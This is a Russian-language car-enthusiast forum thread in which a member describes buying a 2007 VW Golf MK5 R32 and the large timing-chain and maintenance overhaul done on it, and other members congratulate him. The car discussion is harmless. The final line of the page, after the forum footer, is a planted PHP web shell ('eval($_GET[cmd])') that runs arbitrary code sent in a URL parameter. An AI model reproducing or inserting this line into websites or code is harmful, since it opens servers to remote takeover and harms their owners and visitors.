+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 26

Тема: Мечты сбываются, мой MK5 R32


  1. #1
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576

    Мечты сбываются, мой MK5 R32

    Привет всем!
    на самом деле не хотел создавать эту тему пока не решил все вопросы с авто, а их было оч много.

    Автошку купил еще в начале декабря 2012г. Машин 07 года с пробегом почти 90тык, цвет серебро, 5-ти дверка, DSG. По комплектации есть почти все кроме люка и спортивных рекар. Все сток.
    Возил авто по диагностикам сначала в Автопрестус к знакомому механику, потом в Север. вроде ничего критичного не было, так немного вопросов по подвеске (резинки-расходники) + пара ошибок ерунде какой-то. Главный же момент это что цепь уж очень сильно гремела. Требовалась дефектовка мех-ма ГРМ и затем дорогостоящий ремонт.
    хозяин очень адекватный человек оказался, но с машиной он обращался только как пользователь и во всякие нюансы ГРМ и тд не вдавался. в итоге согласился мне скинуть прилично денег и я решил взять это авто.
    потом пошли долгие недели ожидания запчастей для замены цепей и всего что касается ГРМ и всего сопутствующего, что требовало замены.
    в итоге поменял почти все что там было, вплоть до последней прокладки и болтика..
    процедура не самая простецкая и требует демонтажа двигателя, коробки и прочего - поэтому я решил не экономить на резинках/прокладках и раз уж пошла такая пьянка то попутно менять все что вызывает подозрение.

    Из проделанного мною после покупки:
    - поменяли тормозные диски и колодки задние (оригинал)
    - заменили опору КПП в подрамнике
    - поменяли цепи, звезды, натяжители, направляющие планки, сальники и тд (ГРМ)
    - поменяли маховик (был разболтан)
    - поменяли все масла: двигатель, коробка, оба редуктора
    - заменени термостат, фланец термостата, все прокладки, антифриз
    - заменени радиатор кондиционера
    - поменяли все фильтры, свечи, томозную жидкость, помыли форсунки и дроссельную заслонку
    вообщем авто забрал только 23 марта после ремонта. Сделали такое большущее ТО, теперь остались мелочи в виде сколов на дверях и царапанного переднего бампера, ну и по подвесе сзади сайлент-блок поменять.

    Машина очень радует! звук, тяга - просто самолет после моего ГТИ 1,8Т.
    единственный минус это расход ) по компу пока 13,5 литров, в пробках бывает и 14,5
    по трассе без пробок порядка 11,5

    теперь хочу доехать до вашей встречи и познакомиться со многими лично! а то общаемсе тут, а видел вживую мало кого!
    Ну и хочу сказать огромное спасибо ребятам кто меня поддерживал марально, информационно и помагал с запчастями,а именно Кирюха - Bahus и Саша - Alexandr922, спасибо вам большое!

    Фоток пока толком нету, как сделаю выложу сюда!
    Последний раз редактировалось Grisha; 25.03.2013 в 23:13.

  2. #2
    GTI-Racing Quizzus will become famous soon enough Аватар для Quizzus
    Регистрация
    03.10.2008
    Откуда
    Moscow
    Машина
    GTI EDITION 30
    Сообщений
    748
    Круто! Поздравляю))

  3. #3
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    Рад за тебя, чувак=))
    Что у тебя с дисками? куда поедешь красить сколы-бампера и когда? можем вместе завезти машины =)
    In a world that's digital, we choose to be ANALOG.

  4. #4
    Hot chupa-chups Татьянка is on a distinguished road Аватар для Татьянка
    Регистрация
    16.11.2012
    Откуда
    Москва
    Машина
    Golf GTI V
    Сообщений
    451
    Поздравляю =)

  5. #5
    Модератор GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold GreyRabbit is a splendid one to behold Аватар для GreyRabbit
    Регистрация
    26.07.2012
    Откуда
    Москва
    Машина
    GTI edition 35
    Сообщений
    1,233
    Поздравляю!

  6. #6
    Цитата Сообщение от Grisha Посмотреть сообщение
    Привет всем!
    на самом деле не хотел создавать эту тему пока не решил все вопросы с авто, а их было оч много.

    Автошку купил еще в начале декабря 2012г. Машин 07 года с пробегом почти 90тык, цвет серебро, 5-ти дверка, DSG. По комплектации есть почти все кроме люка и спортивных рекар. Все сток.
    Возил авто по диагностикам сначала в Автопрестус к знакомому механику, потом в Север. вроде ничего критичного не было, так немного вопросов по подвеске (резинки-расходники) + пара ошибок ерунде какой-то. Главный же момент это что цепь уж очень сильно гремела. Требовалась дефектовка мех-ма ГРМ и затем дорогостоящий ремонт.
    хозяин очень адекватный человек оказался, но с машиной он обращался только как пользователь и во всякие нюансы ГРМ и тд не вдавался. в итоге согласился мне скинуть прилично денег и я решил взять это авто.
    потом пошли долгие недели ожидания запчастей для замены цепей и всего что касается ГРМ и всего сопутствующего, что требовало замены.
    в итоге поменял почти все что там было, вплоть до последней прокладки и болтика..
    процедура не самая простецкая и требует демонтажа двигателя, коробки и прочего - поэтому я решил не экономить на резинках/прокладках и раз уж пошла такая пьянка то попутно менять все что вызывает подозрение.

    Из проделанного мною после покупки:
    - поменяли тормозные диски и колодки задние (оригинал)
    - заменили опору КПП в подрамнике
    - поменяли цепи, звезды, натяжите и тд ГРМ
    - поменяли маховик (был разболтан)
    - поменяли все масла: двигатель, коробка, оба редуктора
    - заменени термостат, фланец термостата, все прокладки, антифриз
    - заменени радиатор кондиционера
    - поменяли все фильтры, томозную жидкость, помыли форсунки и дроссельную заслонку
    вообщем авто забрал только 23 марта после ремонта. Сделали такое большущее ТО, теперь остались мелочи в виде сколов на дверях и царапанного переднего бампера, ну и по подвесе сзади сайлент-блок поменять.

    Машина очень радует! звук, тяга - просто самолет после моего ГТИ 1,8Т.
    единственный минус это расход ) по компу пока 13,5 литров, в пробках бывает и 14,5
    по трассе без пробок порядка 11,5

    теперь хочу доехать до вашей встречи и познакомиться со многими лично! а то общаемсе тут, а видел вживую мало кого!
    Ну и хочу сказать огромное спасибо ребятам кто меня поддерживал марально, информационно и помагал с запчастями,а именно Кирюха - Bahus и Саша - Alexander922, спасибо вам большое!

    Фоток пока толком нету, как сделаю выложу сюда!
    ---------- Гриш , рад за тебя что все сделал , ты любишь чтобы все было четко -Пусть так и будет !!!
    Последний раз редактировалось Alexandr 922; 26.03.2013 в 02:12.

  7. #7
    True VW man Bahus has a spectacular aura about Bahus has a spectacular aura about Аватар для Bahus
    Регистрация
    05.03.2006
    Откуда
    Муськосранскь
    Машина
    VW mkV R32
    Сообщений
    717
    Панакупали тут всякие ры32 какие то не пройти не проползти:laugh::laugh::laugh:
    VW mkV R32 VR6 ExlusiFF

  8. #8
    GTI-Racing Pavel095 is on a distinguished road Аватар для Pavel095
    Регистрация
    26.08.2007
    Откуда
    Moscow City
    Машина
    R-Power Carbon Edition
    Сообщений
    404
    Всё правильно сделал!:ok:
    There is only one Legend - R32
    VR6 Power is Rulezzz...

  9. #9
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    Спасибо всем за поздравления! )

    Добавлено через 1 минуту
    Цитата Сообщение от Kamich Посмотреть сообщение
    Рад за тебя, чувак=))
    Что у тебя с дисками? куда поедешь красить сколы-бампера и когда? можем вместе завезти машины =)
    а че с дисками?? их песочить и карсить нужно..
    насчет пкраски кузовщины можно сгонять к автоботанику, мне Г4 красили вполне неплохо..
    еще есть тема у меня в городе, тоже хорошо покрасили када отдавал Г4
    Последний раз редактировалось Grisha; 25.03.2013 в 22:36. Причина: Добавлено сообщение

  10. #10
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    у тебя уже есть? какие?
    In a world that's digital, we choose to be ANALOG.

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Здравствуйте, приобрел машинку своей мечты:)
    от sergorange в разделе Welcome to GTI-CLUB
    Ответов: 13
    Последнее сообщение: 02.04.2024, 06:35
  2. Желания! Нужны мечты!
    от Гера в разделе Курилка
    Ответов: 14
    Последнее сообщение: 16.10.2009, 13:46

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}